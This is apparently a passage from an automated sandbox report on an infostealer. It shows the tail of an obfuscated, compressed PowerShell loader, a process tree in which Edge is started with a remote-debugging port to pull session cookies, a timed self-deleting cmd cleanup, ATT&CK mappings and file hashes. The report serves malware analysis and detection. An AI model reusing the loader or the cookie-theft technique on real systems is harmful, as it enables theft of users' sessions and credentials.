QAyAC8AegBvAFkAbgArAEkAVQBJAEsAbQAvAHgAawBpAEwAagBZADEAUwBQAE8ATgBoAE8AbgBzAEEAWQB1AG4AVwBwAG4AagA4AFQAUQByAGgAUwBqAEIAawA3AFcAOAB2AG0AbgByAGYAOABCAGQAMABEAFEASgBMAGwAVQBuAGkAZABUAEwARwA5AFEAbABYAGcARAAvAHcAbgB5AEIAVQBLADQAQQBOAFcAVQBqADkAZQBkAEoAbQBBAFQASwA4AGYAOAB1AGwAdgBiAEoAMwBwAGkAWABCADkANwBlADkAegBXACsAbgBnAGkATgBWADEAQQBaAGwAZAAwAFoANwA5AFgAdwByAFgASgBRADgAcQBXAGoAQQArAGUAdwBtAFEAZgBiAHMANgAyADcASABXADcAUAA4AFkATABRAEIASABDAHMAYwArAGMAcgBYAEoAaQBCADQANQBSAGgANwBWAHMAMQBqAFoAWQBBAG0AUwBwAE8AeABkAFgAKwA0ADgAUwBSADgANgBnAGIAQQAzAHcAUQBpADQAdgBLAEwATAA5ADkAQgBXAHcAcABBADIAeABuAFgAVABXAGMAVwB6AHYAcgBxAEUAMQA1AFAAYgB1AEsASABGAFcAUgA3AHcANABIAEoAcgBEADYAbABVAHAAMgA5ADQARQBGAGUAOQA1AFgAOABhACsAZQBOAEYARwBBAEkAMgB4AHEARABRAC8AcgA2AE4AbABGADgAMwBEAHIASwBKAEIAMQBBAFYASQB6AEcAVABtAE0ALwA1AGgAdABEAHIAQgArAE4AawBDAGUAdQBiADQAcABhAHoAawA4AE8ANgA4AFcAUwBqAG8AMQAzAFYAZwBWAHkAMQBZADQAVgBmADkAUQBqAEkAcABRADgAawBWAEMAMQBkADkAUwBaAEgAVgBmADcAWQB5AGQAMABUAGgARgByAFMAdgBDAGwAaQBsAFoAQQBuAEwASABBAFIARwB4ADAAZgBTAGQAcQBjAHYAWgBDAG8AUwBjAG4AWgB4AGMAQwBCADYAZABrAFEAVABlADkAcwBaAFMAcQBFAGYARQBOAFAAUAAzAFQASgAxAEwAOQBYAEsAaAAxAG8AaQBzAFUAWABOAHUAVwBjAGIAMABSAGwAMABlAG0AZABOAGMAbABHADUAbgAxAGkAUwA0ADYAVgB0AC8AQQBBAD0APQAnACkALABbAHMAeQBTAFQAZQBNAC4ASQBvAC4AQwBPAG0AUAByAGUAUwBzAGkATwBOAC4AYwBPAG0AcAByAGUAUwBTAGkATwBOAE0AbwBkAGUAXQA6ADoAZABFAEMAbwBtAHAAcgBlAFMAUwApAHwAJQB7AG4ARQB3AC0AbwBCAGoARQBDAFQAIABJAE8ALgBzAHQAUgBlAGEAbQByAGUAYQBkAEUAUgAoACQAXwAsAFsAUwBZAFMAVABlAG0ALgBUAGUAeAB0AC4AZQBuAGMAbwBEAGkATgBHAF0AOgA6AEEAcwBjAGkASQApAH0AfAAlAHsAJABfAC4AUgBlAGEARABUAE8AZQBOAGQAKAApAH0AKQAgAA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5684 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3sqz0ne1\3sqz0ne1.cmdline"4⤵PID:2900
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES732C.tmp" "c:\Users\Admin\AppData\Local\Temp\3sqz0ne1\CSCB76A280560FE48389084FC30EF7E3DC5.TMP"5⤵PID:1500
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"3⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:2940 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x260,0x7ff87810f208,0x7ff87810f214,0x7ff87810f2204⤵PID:2884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1880,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=2244 /prefetch:34⤵PID:548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2208,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=2204 /prefetch:24⤵PID:1544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2476,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=2456 /prefetch:84⤵PID:1788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3464,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=3548 /prefetch:14⤵
- Uses browser remote debugging
PID:2872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=3552 /prefetch:14⤵
- Uses browser remote debugging
PID:1156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5048,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=5288 /prefetch:84⤵PID:3652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5108,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=5256 /prefetch:84⤵PID:1940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5956,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=5964 /prefetch:84⤵PID:4832
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\2nopz" & exit3⤵
- System Location Discovery: System Language Discovery
PID:2092 -
C:\Windows\SysWOW64\timeout.exetimeout /t 114⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4440
-
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:4712
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4024
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:3256
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:1784
Network
MITRE ATT&CK Enterprise v16
Defense Evasion
Modify Authentication Process
1Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
288KB
MD58900ece47d3bd26ea398d48fecb34fa8
SHA1b393c8fdafb3a733883caf02d347f22e8e19285a
SHA25694009c06a22ae20b38a9bfeccd9aba3ad976a93531aebd36cb481ebf28eb32ea
SHA512ba5e26519249915e7b5b55c371bc8e582d9da74b90790b5ce2f0cb4fa399a520a780dbe0e31d126c661bf006fbcd0fe83cb394a82217d6aacd574d94a1355548
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
79KB
MD5115d9ce05d47a739e587d36f9c7d1a9e
SHA1b64cb2738901da0b9695025ea32b90f213c69a92
SHA25628bbe5a1f0a5060281fdf42a90c8d02de1352786aba1aa4e171c7ccd7e242f22
SHA512835673212ac7449f17ac26efc1572715ebbdc3389a9f6a5cd053f481936a1bc52cde491453a687623de4ce70a0c54a461ffac282324635b577a70dd9f0d91bf1
-
Filesize
280B
MD536326fcbb6119326e7c8aa24c4156548
SHA1ed128a9727e1d58b970e732b8c66fc827b18372b
SHA256ac41191dcaf36d91f7bd9a077bc59b1bd7218daa27b263d1da6a548f58264987
SHA512ed5c79f1edc0c65a1cf0ace91ea5538245c1569c3b25ae3cdf033ffcb55d37e7b09baec36570e82fc1525c24224cea08a53abab7e52db6376f48f099ffefd1fe
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\0fc6f7c5-ba86-48f0-8560-dff2f42d25af\index-dir\the-real-index
Filesize2KB
MD5511104f39140f1055bf70ff41657eefb
SHA1a9f1a8a91e54edb2b8e1d386d6f4acfe24016b12
SHA25664d803b3b0b846aebce7e9682d84e312ebc1440cb173fc4d1364a9e75dece58c
SHA512f744a512c3b2e030d6a387b4c961a79c5562c0924746220a02324ef6b5a9ce1b58d2926a2515b61c76798a7db46a5c5515072bd6deca30cffd6cc2fe5294f381
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\0fc6f7c5-ba86-48f0-8560-dff2f42d25af\index-dir\the-real-index~RFe5798c5.TMP
Filesize2KB
MD5bcc8812ad0f8f37dd7151537c2c32f8e
SHA189d561bd857bbf2f02ae44253b2181431cc85871
SHA256d2a8d6ca44819eb7909bedec7f74f68ae1387866adcedebd320d31f9a1b73d56
SHA51272d6a39f18058bcdd3c2ee447fe13bcb43210aeeeca1b2e625e6407e86013e5da974c8f8a64a1c2224ef793c552b46fe458b1c9114f4b2bd81b96a9a951c7eeb
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\b2667d68-3d19-4df9-ab2b-65f3cd37f941.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
39KB
MD508a98ed9e14066a563da4f73f185776e
SHA1782731b0e39a3e6e89aefc6021909f24e5ae4bb2
SHA256c3c670af75701aed6877ef516026d7291d38c35f29447a11be18b18e71254ab4
SHA512ee2c553690e0480d40a38fcde06e3c4ee1d892cff2fc255938d32e5f0af771a6419ec19e6120ed921dabce8c4f4f05cb3d9ddd9eeb8cefbb2641db134a59f4fc
-
Filesize
39KB
MD56a453e9c77c3e7668179bc499e5dde17
SHA14f8a566f5826525ecadd1bf0a74e25088d1071c0
SHA256802682aaecc1a4e1c0d713ac9b3d6a6d43f10f7f2ccfc59871f9fd9856fa23f1
SHA512ecd07a7f5f40d919303f005f43ff4fbed915fcc53a21b2e0cdd7e0d4700c8c122bba34a5b37f67720919ecade456de91139a02c82efddf527dcee3b209232d8a
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
Filesize2KB
MD5cdaa77769ee24f4183ebab68c3e00ed5
SHA1a578c607b1e8b3307d52d53f61e80c4e392b5e52
SHA256178e41f0088fb20bd0069622e91cac6817fc3811baf6c5c95c5e03fc01a4dd6c
SHA5124166e3eb55ddd445cbb361bd4d97b347f6cd2bc2f2fbee9d338e1f10ebfddfa37c45e3446767321ffb987272bfd8581ade8ea364d98dfeef34b86efb44a06cc3
-
Filesize
4KB
MD5c9502303989cda40d7d8a516662853bb
SHA1aba250755699cd1e8438f17d80d11168e4e5b7f2
SHA2566e5507af17a40fac4faa9f25db52a0d699456c699e8215e5f32c8c678d131c8b
SHA512321462ba3f204fb2298895998aefa3ebf5dfecf62bb99d9064008f2cc4bb577abdceaf6b597d5f73d70135261c7bb6628f5d830fecd6fce58699f84cdb1effc3
-
Filesize
1KB
MD5d77f5ff08ccbc25bf9bb42761b94e7f9
SHA19b8bcdc7b692358b22c8ac3c1facab7e4c86f8ed
SHA2567fb70e544e4d4be22ebcdd94e7fb8e0ec2eeed6e5474a73302a1e3e0adedc46c
SHA51230da3a110ad087d5b17d1876c865d356257772daa518623f1b66d1aa65a95bc8e86d08135e30bc566d765e2f612d57c2a6d94fe06f732671de4c88594fde0b18
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
156KB
MD5b384b2c8acf11d0ca778ea05a710bc01
SHA14d3e01b65ed401b19e9d05e2218eeb01a0a65972
SHA2560a6b11a5b642bf6c1938189707e109a1f48eb02018cfb146f09e74a753567d1b
SHA512272dd92a3efbf6cefe4b13127e09a9bd6455f5fc4913e7477c6712e4c3fd67efe87bd0d5bf1ec6b1e65f8d3aa0ac99d5bcf88d8a44d3f3116527253a01dde3be
-
Filesize
36KB
MD540a13f9b39d6d3e649cf21f1b47da9ad
SHA1b03d7f8ad2f90c61063e54cf45c01677f6a86942
SHA2563cd5effba4bc90a72efe5e97609c962dd91d5b50e41f13bfa0f5606d322a5278
SHA5127e821747ca4db1654c3ce01e31bc0bddfeb092464b0dea9aa8d5370c01dc0fc141fedcd168553c502a417b7703ced120ff53448c4135338cdff937a6f5f9cd5b
-
Filesize
1KB
MD53d1018b223caf0c61982a29cb26996cc
SHA1743fd8c82380e7d72ec1cb2e05f149e148874b0e
SHA256786a71b68cee9392682824e67abfb89e5ec70ee6fb37213491b5c9a95ac59c92
SHA5127a632143e76410669fff27e2fa184d572a788e9d315f7c2415c7013cb07026678fe1b3e4fb1a77411f82941d7a03c64632c07d3fc1398e2df5741471b9462980
-
Filesize
369B
MD5f78751ab1ea7f1ef1dcfec340b7270b1
SHA1d0d26b482caaf127c6425ec5ae7e7732268d2424
SHA2567d2060c47ca4e7f28c0761eee2e5aa6b77109ba16fe876e232ce7dd43d13e2a4
SHA51274cc6622020ef00dca719dd9cb01e1fb812cd6db67298595d7a179a6491f89744caf7c8039094c303b10f7f186ad1af50a80fa0c7417819ea39a6f54f9f1f7e8
-
Filesize
652B
MD52d1bafe9e2a21dcc8240fdddd29c1d18
SHA185650b380513c043e3ae885ac23440d3b8b799d0
SHA2567056fdbb15b4ad22bf6e18d6be1109e5346dee95813277f2979be01484d2985d
SHA512fd9ecc21dbc387c843b68037003f1984a51a81541e770bb0ed8d595204aabe25714435f21b87faf1f604cb54a6ab7c584a9e9e616e0270bd7e121eaa94c50802